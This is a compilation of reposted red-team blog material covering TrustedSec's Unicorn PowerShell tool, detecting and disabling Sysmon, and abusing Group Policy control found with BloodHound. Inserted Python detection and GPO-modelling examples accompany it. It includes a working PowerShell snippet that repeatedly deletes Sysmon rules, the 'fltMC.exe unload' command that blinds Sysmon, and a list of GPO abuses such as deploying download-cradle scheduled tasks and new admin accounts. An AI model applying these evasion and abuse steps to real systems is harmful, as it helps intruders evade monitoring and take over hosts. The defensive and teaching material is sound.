Attacking PowerShell

8 January 2019

Source: https://github.com/trustedsec/unicorn

https://www.trustedsec.com/2018/06/weaponizing-settingcontent/

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory.

Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Bypass Sysmon

8 January 2019

Source: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon

Shell is Only the Beginning

October 08, 2018 by Carlos Perez in Blue Team, Red Team, PowerShell

Sysmon is a tool written by Mark Russinovich that I have covered in multiple blog posts, and I even wrote a PowerShell module called Posh-Sysmon to help with the generation of configuration files for it. Its main purpose is the tracking of potentially malicious activity on individual hosts, and it is based on the same technology as Procmon. It differs from other Sysinternals tools in that Sysmon is actually installed on the host and saves its information into the Windows Event Log, so it is easier to collect the information with the use of SIEM (Security Information and Event Management) tools.

 Sysmon has the capability to log information for:

  • Process Creation and Termination
  • Process changing a file creation time.
  • Network Connection
  • Driver Load
  • Image Load
  • CreateRemoteThread
  • Raw Access Read of a file
  • A process opens another process memory
  • File Creation
  • Registry Events
  • Pipe Events
  • WMI Permanent Events 

All of the logging is based on rules you specify using the sysmon.exe tool, which are saved into the registry. Most enterprise environments will deploy Sysmon via package management and then push rules by writing the binary blob into the registry of the hosts.

Detect Control

As offensive operators, the first thing we need to do is identify whether Sysmon is present on the system. Normally when we install Sysmon on a system it will create a service to load a driver, the registry key that will store the configuration for the service and the driver, and install an event manifest to define the events and create the event log where it will put the events it generates so they can be collected. So we have multiple places we can look. But sadly, most attackers are creatures of habit and will many times stick to the simplest solution that gives them the most bang for the buck, you could say. In the case of detecting controls there is no difference; most will perform one of the following actions:

  • List processes
  • List services
  • List drivers in C:\Windows\System32\Drivers

The most common one is the listing of drivers, since EDR solutions like Cylance will hide the service name depending on how you call it, and some solutions do not have processes running.

For this very reason Sysmon implements a feature where you can change the name of the exe and the driver so as to obfuscate its presence on the system.

To change the name of the service and the process you just rename the Sysmon executable to whatever name you want. This is useful, but as we can see in the output below, the driver is not renamed.

PS C:\Users\carlos\Desktop> .\HPPrinterController.exe -i

System Monitor v8.00 - System activity monitor
Copyright (C) 2014-2018 Mark Russinovich and Thomas Garnier
Sysinternals - www.sysinternals.com

HPPrinterController installed.
SysmonDrv installed.
Starting SysmonDrv.
SysmonDrv started.
Starting HPPrinterController..
HPPrinterController started.

To change the driver name we would need to specify it with the -d parameter during installation and specify a name for it. 

PS C:\Users\carlos\Desktop> .\HPPrinterController.exe -i -d hpprndrv

System Monitor v8.00 - System activity monitor
Copyright (C) 2014-2018 Mark Russinovich and Thomas Garnier
Sysinternals - www.sysinternals.com

HPPrinterController installed.
hpprndrv installed.
Starting hpprndrv.
hpprndrv started.
Starting HPPrinterController..
HPPrinterController started.

One thing to take into account: for uninstalling and for updating the configuration of the service, one has to use a copy of Sysmon with the name we chose, and the registry path for the configuration will also use the name we chose. This is very important during regular operation, when upgrading Sysmon and pushing out new rules.

We can still look at the filter drivers that have been loaded by the system and look at their altitude numbers using fltmc.exe, or, if the agent we are using is Meterpreter, Beacon or any other with support for Mimikatz, we can also use Mimikatz with the command misc::mflt to list the driver altitude numbers from memory. The Sysmon driver will have an altitude number of 385201.

With Mimikatz:

mimikatz # misc::mflt
0 3     385201 hpprndrv
0 0     244000 storqosflt
0 1     189900 wcifs
0 0     180451 CldFlt
0 0     141100 FileCrypt
0 1     135000 luafv
0 1      46000 npsvctrig
0 3      40700 Wof
0 4      40500 FileInfo

With fltMC.exe:

PS C:\> fltMC.exe

Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
hpprndrv                                3       385201         0
storqosflt                              0       244000         0
wcifs                                   1       189900         0
CldFlt                                  0       180451         0
FileCrypt                               0       141100         0
luafv                                   1       135000         0
npsvctrig                               1        46000         0
Wof                                     3        40700         0
FileInfo                                4        40500         0

If we are operating in a more contested or non-permissive environment where running fltmc.exe or loading Mimikatz is bound to raise alarms, a less accurate way is to check for the presence of the Sysmon event log. It will at least let us know that Sysmon is present or was installed on the system. For this we can check the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational

PS C:\> ls HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels | Where-Object {$_.name -like "*sysmon*"}

    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels

Name                           Property
----                           --------
Microsoft-Windows-Sysmon/Opera OwningPublisher : {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
tional                         Enabled         : 1
                               Isolation       : 2
                               ChannelAccess   : O:BAG:SYD:(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x1;;;BO)(A;;0x1;;;SO)(A;;0x1;;;S-1-5-32-573)
                               MaxSize         : 67108864
                               MaxSizeUpper    : 0
                               Type            : 1

Another sign we can look for in the registry is the key that all Sysinternals tools populate to record that the license was accepted for the tool. In the case of Sysmon it will be listed under HKCU\Software\Sysinternals for the user.

PS C:\> ls HKCU:\Software\Sysinternals  | Select-Object name

Name
----
HKEY_CURRENT_USER\Software\Sysinternals\Process Explorer
HKEY_CURRENT_USER\Software\Sysinternals\Process Monitor
HKEY_CURRENT_USER\Software\Sysinternals\sigcheck
HKEY_CURRENT_USER\Software\Sysinternals\Streams
HKEY_CURRENT_USER\Software\Sysinternals\Strings
HKEY_CURRENT_USER\Software\Sysinternals\System Monitor
HKEY_CURRENT_USER\Software\Sysinternals\ZoomIt

There is also a way to find the service and know whether it was renamed. Sysmon keeps the description of the service as “System Monitor service” even when its name is modified. This makes it trivial to identify the service by this string using WMI or sc.exe.

PS C:\> Get-CimInstance win32_service -Filter "Description = 'System Monitor service'"

ProcessId Name                StartMode State   Status ExitCode
--------- ----                --------- -----   ------ --------
2220      HPPrinterController Auto      Running OK     0

Circumventing Sysmon

Working Around Rules

We have two options to circumvent Sysmon: the first is to operate inside the blind spots of its rule set, the second is to disable it completely. Matt Graeber was able to reverse engineer and make public the format of the registry key, and there is a .NET assembly written by HarmJ0y called Seatbelt (https://github.com/GhostPack/Seatbelt) that we can load with Cobalt Strike's assembly loading to read the config in memory; or, if we pull the registry key, Matt has a PowerShell function to parse it: https://github.com/mattifestation/PSSysmonTools/blob/master/PSSysmonTools/Code/SysmonRuleParser.ps1. By knowing the rules, we can operate around them.

Deleting Configuration

We can clear the rule entry in the registry. Sysmon will see the registry being changed and will automatically reload the configuration, and since no rules are present it will be blinded temporarily, depending on how the configuration is maintained. If the configuration is managed by a configuration management system like Ansible, Chef or DSC, it could be a matter of seconds to minutes before the configuration is changed back to its original state; if it is managed by a GPO, it can be restored within 90 minutes when the GPO refreshes. To combat this we can create, in any Windows technology (.NET, VBS, PE file, etc.), a WMI temporary consumer (https://docs.microsoft.com/en-us/windows/desktop/wmisdk/receiving-a-wmi-event) that will monitor the registry key and, when it notices a change to it, delete it or set its content again. The reason for a temporary consumer is that most solutions look for WMI permanent events being created or modified.

$query = "SELECT * FROM RegistryKeyChangeEvent " +
    "WHERE Hive ='HKEY_LOCAL_MACHINE' " +
    "AND KeyPath ='SYSTEM\\CurrentControlSet\\Services\\SysmonDrv\\Parameters'"

Register-WMIEvent -Query $query -Action {
    Write-Host "Sysmon config updated, deleting config."
    Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\SysmonDrv\Parameters" -Name "Rules"
}

One of the things to keep in mind is that Sysmon will revert to its default configuration, so it will still log the process creation and process termination events.

If we want to track the use of the WMI event subscription, it will be logged in the event log under WMI-Activity/Operational with an Event ID of 5860, with the EventData field Possible Cause set to Temporary; it will also include the Process ID of the process that created it.

Another giveaway, if your configuration includes rule names for each filter, is that once the configuration has been deleted the process creation and process termination events will have a blank rule name in them when using Sysmon 8.0.

You can also set auditing rules via GPO on the registry key and log an event 4687 under the Security log that will include the user and the process information for the change of the registry key. If the process information shows that the change was not made by Sysmon or by the process that changes the key during GPO updates, you can trigger an alert on this in your SIEM.

Unload SysmonDrv Filter Driver

Another action that can be taken is to unload the SysmonDrv filter driver that gives Sysmon the information on all disk actions that it then writes to the event log. As we saw before, this driver has a unique altitude number, and if we are running as administrator we can unload this driver, at which point Sysmon is essentially blinded completely. We can unload the driver with the fltmc.exe tool. Here we are unloading our hidden driver that we identified via the altitude number.

PS C:\> fltMC.exe

Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
hpprndrv                                3       385201         0
storqosflt                              0       244000         0
wcifs                                   1       189900         0
CldFlt                                  0       180451         0
FileCrypt                               0       141100         0
luafv                                   1       135000         0
npsvctrig                               1        46000         0
Wof                                     3        40700         0
FileInfo                                4        40500         0

PS C:\> fltMC.exe unload hpprndrv

PS C:\> fltMC.exe

Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
storqosflt                              0       244000         0
wcifs                                   1       189900         0
CldFlt                                  0       180451         0
FileCrypt                               0       141100         0
luafv                                   1       135000         0
npsvctrig                               1        46000         0
Wof                                     3        40700         0
FileInfo                                4        40500         0

Sysmon will actually log, as its last event, the execution of the fltmc.exe command, so this could be a trigger in the SIEM when this command is executed with the unload parameter.

It will also be logged under the System log as event 1 with source Filter Manager and Task Category None.
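The tells described in this section can be checked mechanically from a defender's side. The following is an added example (not code from the post, from Sysmon or from Mimikatz) that parses fltmc.exe output to confirm the Sysmon minifilter is still loaded under whatever name it was given, using the 385201 altitude from above, and scans event records for the three indicators just discussed: a WMI-Activity/Operational 5860 event for a temporary consumer watching a driver's Parameters key, Sysmon process events with a blank RuleName, and the Filter Manager unload event in the System log. It is written in Python so it runs offline over exported data; the fltmc text and event records below are constructed for the example, and the flattened record shape ({"channel", "id", "provider", "data"}) and field names such as PossibleCause and ProcessID are assumptions standing in for whatever your export produces.

```python
"""Blue-team checks for the Sysmon tampering indicators discussed above.

Added example, not code from the post. Input shapes are assumptions:
fltmc.exe text as printed on the console, and event records flattened to
{"channel", "id", "provider", "data"} as one might build from Get-WinEvent.
"""
import re

# Altitude assigned to the Sysmon minifilter, as stated in the post.
SYSMON_ALTITUDE = 385201

# Constructed fltmc.exe output before and after an unload; the driver name
# is the renamed one used in the post, not a real deployment value.
FLTMC_BEFORE = """\
Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
hpprndrv                                3       385201         0
storqosflt                              0       244000         0
luafv                                   1       135000         0
"""
FLTMC_AFTER = """\
Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
storqosflt                              0       244000         0
luafv                                   1       135000         0
"""

_FLTMC_ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\d+)\s+(\d+)$")


def parse_fltmc(text):
    """Parse the fltmc.exe table into dicts; header and separator lines never match."""
    rows = []
    for line in text.splitlines():
        m = _FLTMC_ROW.match(line.strip())
        if m:
            rows.append({"name": m.group(1), "instances": int(m.group(2)),
                         "altitude": int(m.group(3)), "frame": int(m.group(4))})
    return rows


def sysmon_filter_name(text):
    """Return the loaded filter carrying Sysmon's altitude (whatever it was renamed to), else None."""
    for row in parse_fltmc(text):
        if row["altitude"] == SYSMON_ALTITUDE:
            return row["name"]
    return None


# Constructed event records; field names are assumptions for this example.
SAMPLE_EVENTS = [
    {"channel": "Microsoft-Windows-WMI-Activity/Operational", "id": 5860,
     "provider": "Microsoft-Windows-WMI-Activity",
     "data": {"PossibleCause": "Temporary", "ProcessID": 4120,
              "Query": "SELECT * FROM RegistryKeyChangeEvent WHERE Hive ='HKEY_LOCAL_MACHINE' "
                       "AND KeyPath ='SYSTEM\\\\CurrentControlSet\\\\Services\\\\SysmonDrv\\\\Parameters'"}},
    {"channel": "Microsoft-Windows-Sysmon/Operational", "id": 1, "provider": "Microsoft-Windows-Sysmon",
     "data": {"RuleName": "", "Image": "C:\\Windows\\System32\\cmd.exe"}},
    {"channel": "Microsoft-Windows-Sysmon/Operational", "id": 1, "provider": "Microsoft-Windows-Sysmon",
     "data": {"RuleName": "technique_id=T1059", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"}},
    {"channel": "System", "id": 1, "provider": "Microsoft-Windows-FilterManager",
     "data": {"Message": "File System Filter 'hpprndrv' unloaded successfully."}},
]


def find_tampering(events, expect_rule_names=True):
    """Return (indicator, detail) pairs for the events that match the post's tells.

    expect_rule_names: set False if your Sysmon config does not name its rules,
    otherwise a blank RuleName on process events is a normal condition.
    """
    findings = []
    for ev in events:
        channel, eid, data = ev["channel"], ev["id"], ev.get("data", {})
        provider = ev.get("provider", "").replace(" ", "").lower()
        # WQL stores backslashes doubled; normalise so the key path compares cleanly.
        query = data.get("Query", "").lower().replace("\\\\", "\\")
        if (channel.endswith("WMI-Activity/Operational") and eid == 5860
                and data.get("PossibleCause") == "Temporary"
                and "registrykeychangeevent" in query
                and "currentcontrolset\\services\\" in query
                and query.rstrip("'").endswith("\\parameters")):
            # A non-persistent consumer watching a driver's Parameters key;
            # the event carries the PID of the subscribing process.
            findings.append(("wmi-temporary-consumer-on-service-key", data.get("ProcessID")))
        elif (channel.endswith("Sysmon/Operational") and eid in (1, 5)
                and expect_rule_names and not data.get("RuleName")):
            # With the rules removed, Sysmon 8.0's default process events carry no rule name.
            findings.append(("sysmon-event-without-rulename", data.get("Image")))
        elif (channel == "System" and eid == 1 and "filtermanager" in provider
                and "unloaded" in data.get("Message", "").lower()):
            findings.append(("minifilter-unloaded", data.get("Message")))
    return findings


if __name__ == "__main__":
    print("Sysmon filter before:", sysmon_filter_name(FLTMC_BEFORE))
    print("Sysmon filter after: ", sysmon_filter_name(FLTMC_AFTER))
    for indicator, detail in find_tampering(SAMPLE_EVENTS):
        print(indicator, "->", detail)
```

On a real host the records would come from Get-WinEvent or a SIEM export; mapping them into this shape is the only integration work. The fltmc check doubles as a fleet health check, since the Sysmon entry disappearing from the table is the direct consequence of the unload shown above, and keying on the altitude rather than the name means a renamed driver is still recognised.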

Conclusion

When identifying controls in an adversarial simulation, look for more than one indicator of the presence of the control, and once it is identified, pull the pertinent pieces of information that will inform us of the level of maturity and skill of the team defending the targeted network.


As always, I hope you find this blog post useful and informative. 

Update 10/8/18 - added screenshots of events in the event log and more details to track abuse.


Active Directory - examine :)

29 December 2018

source: https://wald0.com/?p=179

A Red Teamer’s Guide to GPOs and OUs

Active Directory is a vast, complicated landscape comprised of users, computers, and groups, and the complex, intertwining permissions and privileges that connect them. The initial release of BloodHound focused on the concept of derivative local admin, then BloodHound 1.3 introduced ACL-based attack paths. Now, with the release of BloodHound 1.5, pentesters and red-teamers can easily find attack paths that include abusing control of Group Policy, and the objects that those Group Policies effectively apply to.

In this blog post, I’ll recap how GPO (Group Policy Object) enforcement works, how to use BloodHound to find GPO-control based attack paths, and explain a few ways to execute those attacks.


Prior Work

Lucas Bouillot and Emmanuel Gras included GPO control and OU structure in their seminal work, “Chemins de contrôle en environnement Active Directory”. They used an attack graph to map which principals could take control of GPOs, and which OUs those GPOs applied to, then chased that down to the objects affected by those GPOs. We learned a lot from Lucas and Emmanuel’s white paper (in French), and I’d highly recommend you read it as well.

There are several important authors and resources we leaned on when figuring out how GPO works, in no particular order: the Microsoft Group Policy team’s posts on TechNet, Sean Metcalf’s work at adsecurity.org, 14-time Microsoft MVP “GPO Guy” Darren Mar-Elia, Microsoft’s Group Policy functional specification, and last but certainly not least, Will Schroeder’s seminal blog post on Abusing GPO Permissions. Special extra thanks to Darren Mar-Elia for answering a lot of my questions about Group Policy. Thanks, Darren! Other resources and references are linked at the bottom of this blog post.


The Moving Parts of Group Policy

There’s no two ways about it: GPO enforcement is a complicated beast with a lot of moving parts. With that said, let’s start at the very basics with the vocabulary used in the rest of the post, and build up to explaining how those moving parts interact with one another:

GPO: A Group Policy Object. When an Active Directory domain is first created, two GPOs are created as well: “Default Domain Policy” and “Default Domain Controllers”. GPOs contain sets of policies that affect computers and users. For example, you can use a GPO policy to control the Windows desktop background on computers. GPOs are visible in the Group Policy Management GUI here:

Above: The list of GPOs in our test domain.

Technically, “Default Domain Controllers Policy” is the display name of the GPO, while the name of the GPO is a GPO curly braced “GUID”. I put “GUID” in quotation marks because this identifier is not actually globally unique. The “Default Domain Controllers Policy” in every Active Directory domain will have the same “name” (read: curly braced GUID): {6AC1786C-016F-11D2-945F-00C04fB984F9}. For this reason, GPOs have an additional parameter called objectguid, which actually is globally unique. The policy files for any given GPO reside in the domain SYSVOL at the policy’s gpcfilesyspath (ex: \\contoso.local\sysvol\contoso.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}).

Above: The relevant properties of the “Default Domain Controllers Policy” GPO, and that GPO’s policy files location in the SYSVOL.

OU: An Organizational Unit. According to Microsoft’s TechNet, OUs are “general-purpose container[s] that can be used to group most other object classes together for administrative purposes”. Basically, OUs are containers that you place principals (users, groups, and computers) into. Organizations will commonly use OUs to organize principals based on department and/or geographic location. Additionally, OUs can of course be nested within other OUs. This usually results in a relatively complex OU tree structure within a domain, which can be difficult to navigate without first being very familiar with the tree. You can see OUs in the ADUC (Active Directory Users and Computers) GUI. In the below screenshot, “ContosoUsers” is a child OU of the CONTOSO.LOCAL domain, “Helpdesk” is a child OU within the “ContosoUsers” OU, and “Alice Admin” is a child user of the “Helpdesk” OU:

Above: The Alice Admin user within the OU tree.

GpLink: A Group Policy Link. GPOs can be “linked” to domains, sites, and OUs. By default, a GPO that is linked to an OU will apply to the child objects of that OU. For example, the “Default Domain Policy” GPO is linked, by default, to the domain object, while the “Default Domain Controllers Policy” is linked, by default, to the Domain Controllers OU. In the below screenshot, you can see that if we expand the “contoso.local” domain and the “Domain Controllers” OU, the GPOs linked to those objects appear below them:

Above: The “Default Domain Policy” is linked to the domain “contoso.local”. The “Default Domain Controllers” policy is linked to the “Domain Controllers” OU.

GpLinks are stored on the objects the GPO is linked to, on the attribute called “gplink”. The format of the “gplink” attribute value is [<Distinguished name of the GPO>;<0 if the link is not enforced, 1 if the link is enforced>]. You can easily enumerate those links with PowerView as in the example below:

Above: The “Default Domain Controllers Policy” GPO is linked to the “Domain Controllers” OU, and is not enforced.

Those three pieces — GPOs, OUs, and GpLinks — comprise the major moving parts we’re working with. It’s important to know those three pieces well before understanding GPO enforcement logic and how to use BloodHound to find attack paths, so make sure you feel confident with those before continuing on. One last note: GPOs can also be linked to sites, but at this time we’re not including that due to complications with site memberships and collection challenges.


GPO Enforcement Logic

Now that you know the basic moving parts, let’s look more closely at how they connect. GPO enforcement logic, very briefly, works like this:

  • GpLinks can be enforced, or not.
  • OUs can block inheritance, or not.
  • If a GpLink is enforced, the associated GPO will apply to the linked OU and all child objects, regardless of whether any OU in that tree blocks inheritance.
  • If a GpLink is not enforced, the associated GPO will apply to the linked OU and all child objects, unless any OU within that tree blocks inheritance.

There are further complications on top of this, which we’ll get to later on. First though, let’s visualize the above rules regarding GpLink enforcement and OUs blocking inheritance. Recall earlier I had a user called Alice Admin within a HelpDesk OU. Instead of looking at that in ADUC, though, let’s start to think about this as a graph:

Above: Alice Admin within the domain/OU tree.

The domain object, Contoso.Local, is a container object. It contains the OU called ContosoUsers. The OU ContosoUsers contains the OU HelpDesk. Finally, the OU HelpDesk contains the user Alice Admin.

Now, let’s add our Default Domain Policy GPO into the mix. Recall from earlier that in my test domain, that GPO is linked to the domain object:

Above: The “Default Domain Policy” GPO is linked to the domain object.

Now, in default circumstances, you can simply read from left to right to figure out that the Default Domain Policy will apply to the user Alice Admin. The “default circumstance” here is that the GpLink relationship is not enforced, and that none of the containers in this path block inheritance. Let’s add that information to the above graph:

In this circumstance, it doesn’t matter that the GpLink edge is not enforced, as none of the OUs block inheritance. In our test domain, we have another OU under ContosoUsers called “Accounting”, with one user in that OU: Bob User. For example’s sake, we’ll say that the Accounting OU does block inheritance. Let’s add that to our existing graph:

Again, we can see that the Default Domain Policy GPO is linked to the domain object, and Bob User is contained within the OU tree under the domain object; however, because the OU “Accounting” blocks inheritance, and because the GpLink edge is not enforced, the Default Domain Policy will not apply to Bob User.

Still with me? You’d be forgiven for being slightly confused at this point, but don’t worry, it gets worse!

Let’s add another GPO to the mix and link it to the domain object as well, except this time we will enforce the GpLink:

Our new GPO called “Custom Password Policy” is linked to the domain object, which again contains the entire OU tree under it. Now, because the GPLink is enforced, this policy will apply to all child objects in the OU tree, regardless of whether any of those OUs block inheritance. This means that the “Custom Password Policy” GPO will apply to both “Alice Admin” and “Bob User”, despite the “Accounting” OU blocking inheritance.
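The gplink format and the enforcement rules above can be turned into a small model that reproduces the Alice Admin / Bob User walkthrough. This is an added example, not code from the post or from BloodHound/SharpHound, written in Python. It assumes gPLink values stored as [LDAP://<GPO DN>;<options>] strings on the linked container; note that the options value is a bit field in the MS-GPOL specification (1 = link disabled, 2 = link enforced), so the example tests the enforced bit rather than comparing the value with 1, and the PowerView output referenced earlier shows the 0 (not enforced) case. The Default Domain Policy and Default Domain Controllers Policy GUIDs are the well-known ones; the Custom Password Policy GUID is a constructed placeholder.

```python
"""Effective-GPO computation following the gPLink/enforcement rules in the post.

Added example, not BloodHound's or the post's code. Assumptions: gPLink entries are
"[LDAP://<GPO DN>;<options>]" strings on the linked container, and options is the
MS-GPOL bit field (1 = link disabled, 2 = link enforced).
"""
import re
from dataclasses import dataclass, field

LINK_DISABLED, LINK_ENFORCED = 0x1, 0x2
_GPLINK_ENTRY = re.compile(r"\[(?:LDAP://)?([^;\]]+);(\d+)\]", re.IGNORECASE)

# Well-known GUIDs for the two default policies; the Custom Password Policy GUID
# is a constructed placeholder standing in for the post's test domain.
DEFAULT_DOMAIN_POLICY = "CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=contoso,DC=local"
DEFAULT_DC_POLICY = "CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=contoso,DC=local"
CUSTOM_PASSWORD_POLICY = "CN={00000000-0000-4000-8000-000000000001},CN=Policies,CN=System,DC=contoso,DC=local"


def parse_gplink(value):
    """Return [(gpo_dn, enforced)] for the links in a gPLink value, skipping disabled ones."""
    links = []
    for dn, options in _GPLINK_ENTRY.findall(value or ""):
        options = int(options)
        if options & LINK_DISABLED:
            continue
        links.append((dn, bool(options & LINK_ENFORCED)))
    return links


@dataclass
class Container:
    """A domain or OU: its own links, whether it blocks inheritance, and what it holds."""
    name: str
    gplink: str = ""
    block_inheritance: bool = False
    children: list = field(default_factory=list)   # child Containers
    members: list = field(default_factory=list)    # user/computer names


def effective_gpos(root):
    """Map each user/computer under root to the GPO DNs that apply to it.

    Enforced links survive any block-inheritance setting further down; unenforced
    links are dropped at the first OU that blocks inheritance (that OU's own links
    still apply). The order of the returned list is not a precedence order.
    """
    applies = {}

    def walk(node, enforced, unenforced):
        if node.block_inheritance:
            unenforced = []                       # discard only the unenforced inheritance
        own = parse_gplink(node.gplink)
        enforced = enforced + [dn for dn, e in own if e]
        unenforced = [dn for dn, e in own if not e] + unenforced
        for member in node.members:
            applies[member] = enforced + unenforced
        for child in node.children:
            walk(child, enforced, unenforced)

    walk(root, [], [])
    return applies


def contoso_example():
    """The post's test domain: Accounting blocks inheritance, Custom Password Policy is enforced."""
    helpdesk = Container("Helpdesk", members=["Alice Admin"])
    accounting = Container("Accounting", block_inheritance=True, members=["Bob User"])
    users = Container("ContosoUsers", children=[helpdesk, accounting])
    dcs = Container("Domain Controllers", gplink=f"[LDAP://{DEFAULT_DC_POLICY};0]", members=["DC01$"])
    domain = Container("contoso.local",
                       gplink=f"[LDAP://{DEFAULT_DOMAIN_POLICY};0][LDAP://{CUSTOM_PASSWORD_POLICY};2]",
                       children=[users, dcs])
    return effective_gpos(domain)


if __name__ == "__main__":
    for principal, gpos in contoso_example().items():
        print(principal, "<-", [dn.split(",")[0] for dn in gpos])
```

The walk keeps enforced and unenforced links in separate lists so that an OU with block inheritance only discards the unenforced list; the OU's own links are added after that reset, which is why a policy linked directly to a blocking OU still applies to its members. WMI filtering, security filtering and link precedence, which the post covers next, are outside this model, so a GPO the model says applies can still be filtered out or overruled in practice.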

In our experience, this information is going to cover 95%+ of situations you’ll run into in real enterprise networks; however, there are three more things to know about, which may impact you when abusing GPO control paths during your pentests and red team assessments: WMI filtering, security filtering, and Group Policy link order and precedence.

  • WMI filtering allows administrators to further limit which computers and users a GPO will apply to, based on whether a certain WMI query returns True or False. For example, when a computer is processing group policy, it may run a WMI query that checks if the operating system is Windows 7, and only apply the group policy if that query returns true. See Darren Mar-Elia’s excellent blog post for further details.
  • Security filtering allows administrators to further limit which principals a GPO will apply to. Administrators can limit the GPO to apply to specific computers, users, or the members of a specific security group. By default, every GPO applies to the “Authenticated Users” principal, which includes any principal that successfully authenticates to the domain. For more details, see this post on the TechGenix site.
  • Group Policy link order dictates which Group Policy “wins” in the event of conflicting, non-merging policies. Imagine you have two “Password Policy” GPOs: one that requires users to change their password every 30 days, and one that requires users to change their password every 60 days. Whichever policy is higher in the precedence order is the policy that will “win”. The group policy client enforces this “win” condition by processing policies in reverse order of precedence, so the highest precedence policy is processed last, and “wins”. Luckily, you don’t need to worry about this for almost every abuse primitive. For more information, check out this blog post.

Like I said above, our experience has been that in real enterprise networks, you won’t need to worry about WMI filtering, security filtering, or GpLink order in 95% or more of the situations you run into, but I mention them so you know where to start troubleshooting if your abuse actions aren’t working. We may try to roll those three items into the BloodHound interface in the future. In the meantime, make sure your target computer and user objects won’t be filtered out by WMI or security filters, or attempt to push an evil group policy that will be overruled by a higher precedence policy.


Analysis with BloodHound

First, make sure you are running at least BloodHound 1.5.1. Second, do your standard SharpHound collection like you always have, but this time either do the “All” or “Containers” and “ACL” collection methods, which will collect GPO ACLs and OU structure for you:

C:\> SharpHound.exe -c All

Then, import the resulting acls.csv, container_gplinks.csv, and container_structure.csv through the BloodHound interface like normal. Now you’re ready to start analyzing outbound and inbound GPO control against objects.

For example, let’s take a look at our “Alice Admin” user. If we search for this user, then click on the user node, you’ll see some new information in the user tab, including “Effective Inbound GPOs”:

Above: Two GPOs apply to Alice Admin.

The Cypher query that generates this number does the GpLink enforcement and OU blocking inheritance logic for you, so you don’t need to worry about working that out yourself. Simply click on the number “2”, in this instance, to visualize the GPOs that apply to “Alice Admin”:

Above: How the two GPOs apply to Alice Admin.

Notice the edge connecting “Default Domain Policy” to the “Contoso.Local” domain is dotted. This means that this GPO is not enforced; however, all of the “Contains” edges are solid, meaning that none of those containers block inheritance. Recall from earlier that unenforced GpLinks will only be affected by OUs that block inheritance, so in this case, the Default Domain Policy still applies to Alice Admin.

Also note that the edge connecting “Custom Password Policy” to the “Contoso.Local” domain is solid. This means that this GPO is enforced, and will therefore apply to all child objects regardless of whether any subsequent containers block inheritance.

We can also see the flip side of this — what objects does any given GPO effectively apply to? First, let’s check out the Custom Password Policy GPO:

Above: The Custom Password Policy GPO applies to 3 computers and 5 users.

Reminder: GPOs can only apply to users and computers, not security groups.

By clicking on the numbers, you can render the objects affected by this GPO, and how the GPO applies to those objects. If we click the “5” next to “User Objects”, we get this graph:

Above: How the Custom Password Policy GPO applies to user objects.

There are two important things to point out here. First, again, the edge connecting the “Custom Password Policy” GPO to the “Contoso.Local” domain object is solid, meaning this GPO is enforced. Second, notice the edge connecting the “Accounting” OU to the “Bob User” user is dotted, indicating the “Accounting” OU blocks inheritance. But because the “Custom Password Policy” GPO is enforced, the OU blocking inheritance doesn’t matter, and the GPO will be applied to the “Bob User” user anyway.

Compare the above graph to the graph we get if we do the same for the “Default Domain Policy”:

Above: The users affected by the “Default Domain Policy” GPO.

Notice how the “Bob User” user is no longer there? That’s because the “Default Domain Policy” GPO is not enforced. Because the “Accounting” OU blocks inheritance, that GPO will not apply to the “Bob User” user.

Alright, let’s put it all together and see if we can find an attack path from “Bob User” to “Alice Admin”. In the BloodHound search bar, click the path finding icon, then select your source node and target node. Hit enter, and BloodHound will find and render an attack path, if one exists:

Above: The attack path from “Bob User” to “Alice Admin”.

Reading this graph from left to right, we can see that “Bob User” is in a group called “Accounting”, which is part of a group called “Group Policy Admins” (believe me when I say crazier things have happened in the wild, and remember this is a contrived example :). The “Group Policy Admins” group has, as you would imagine, full control of the “Custom Password Policy” GPO. That GPO is then linked to the “Contoso.Local” domain. From here we have a couple options – push an evil policy down to the “Administrator” user and take over “Alice Admin” with an ACL based attack or just push an evil policy down directly to the “Alice Admin” user.


Abusing GPO Control

Finally, the most important part of this entire topic: how to actually take over computers and users with control over the GPOs that affect those users. For a bit of background and inspiration, read Will’s excellent blog post on abusing GPO rights, which contains information about the first proof-of-concept GPO abuse cmdlet that I’m aware of, New-GPOImmediateTask.

When people say “you can do anything with GPO”, they really mean it: you can do anything with GPO. Will and I put together this list of abuses against computers, including the policy location and abuse, just to give you a few ideas:

  • Policy Location: Computer Configuration\Preferences\Control Panel Settings\Folder Options
  • Abuse: Create/alter file type associations, register DDE actions with those associations.

  • Policy Location: Computer Configuration\Preferences\Control Panel Settings\Local Users and Groups
  • Abuse: Add new local admin account.

  • Policy Location: Computer Configuration\Preferences\Control Panel Settings\Scheduled Tasks
  • Abuse: Deploy a new evil scheduled task (ie: PowerShell download cradle).

  • Policy Location: Computer Configuration\Preferences\Control Panel Settings\Services
  • Abuse: Create and configure new evil services.

  • Policy Location: Computer Configuration\Preferences\Windows Settings\Files
  • Abuse: Affected computers will download a file from the domain controller.

  • Policy Location: Computer Configuration\Preferences\Windows Settings\INI Files
  • Abuse: Update existing INI files.

  • Policy Location: Computer Configuration\Preferences\Windows Settings\Registry
  • Abuse: Update specific registry keys. Very useful for disabling security mechanisms, or triggering code execution in any number of ways.

  • Policy Location: Computer Configuration\Preferences\Windows Settings\Shortcuts
  • Abuse: Deploy a new evil shortcut.

